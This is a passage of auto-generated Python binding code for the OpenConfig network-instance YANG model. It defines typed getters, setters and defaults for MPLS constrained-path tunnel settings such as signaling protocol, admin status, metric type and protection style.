        do so via calling thisObj._set_signaling_protocol() directly.

        YANG Description: Signaling protocol used to set up this tunnel
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={
                        "PATH_SETUP_RSVP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-types:PATH_SETUP_RSVP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mplst:PATH_SETUP_RSVP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-t:PATH_SETUP_RSVP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "PATH_SETUP_SR": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-types:PATH_SETUP_SR": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mplst:PATH_SETUP_SR": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-t:PATH_SETUP_SR": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "PATH_SETUP_LDP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-types:PATH_SETUP_LDP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mplst:PATH_SETUP_LDP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-t:PATH_SETUP_LDP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                    },
                ),
                is_leaf=True,
                yang_name="signaling-protocol",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="identityref",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """signaling_protocol must be of a type compatible with identityref""",
                    "defined-type": "openconfig-network-instance:identityref",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="signaling-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
                }
            )

        self.__signaling_protocol = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_signaling_protocol(self):
        self.__signaling_protocol = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                },
            ),
            is_leaf=True,
            yang_name="signaling-protocol",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=True,
        )
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
YANG Description: optional text description for the tunnel
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
YANG Description: optional text description for the tunnel
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """description must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
}
)
self.__description = t
if hasattr(self, "_set"):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
def _get_admin_status(self):
"""
Getter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
YANG Description: TE tunnel administrative state.
"""
return self.__admin_status
def _set_admin_status(self, v, load=False):
"""
Setter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_admin_status is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_admin_status() directly.
YANG Description: TE tunnel administrative state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """admin_status must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:ADMIN_UP"), is_leaf=True, yang_name="admin-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__admin_status = t
if hasattr(self, "_set"):
self._set()
def _unset_admin_status(self):
self.__admin_status = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_preference(self):
"""
Getter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
return self.__preference
def _set_preference(self, v, load=False):
"""
Setter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_preference is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_preference() directly.
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """preference must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['1..255']}), is_leaf=True, yang_name="preference", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__preference = t
if hasattr(self, "_set"):
self._set()
def _unset_preference(self):
self.__preference = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with int32""",
"defined-type": "int32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['-2147483648..2147483647']}, int_size=32), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='int32', is_config=True)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
def _get_shortcut_eligible(self):
"""
Getter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
YANG Description: Whether this LSP is considered to be eligible for use as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
return self.__shortcut_eligible
def _set_shortcut_eligible(self, v, load=False):
"""
Setter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_shortcut_eligible is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shortcut_eligible() directly.
YANG Description: Whether this LSP is considered to be eligible for use as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shortcut_eligible must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("true"), is_leaf=True, yang_name="shortcut-eligible", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__shortcut_eligible = t
if hasattr(self, "_set"):
self._set()
def _unset_shortcut_eligible(self):
self.__shortcut_eligible = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_protection_style_requested(self):
"""
Getter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
YANG Description: Style of MPLS FRR protection desired: can be
link, link-node, or unprotected.
"""
return self.__protection_style_requested
def _set_protection_style_requested(self, v, load=False):
"""
Setter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_protection_style_requested is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_protection_style_requested() directly.
YANG Description: Style of MPLS FRR protection desired: can be
link, link-node, or unprotected.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
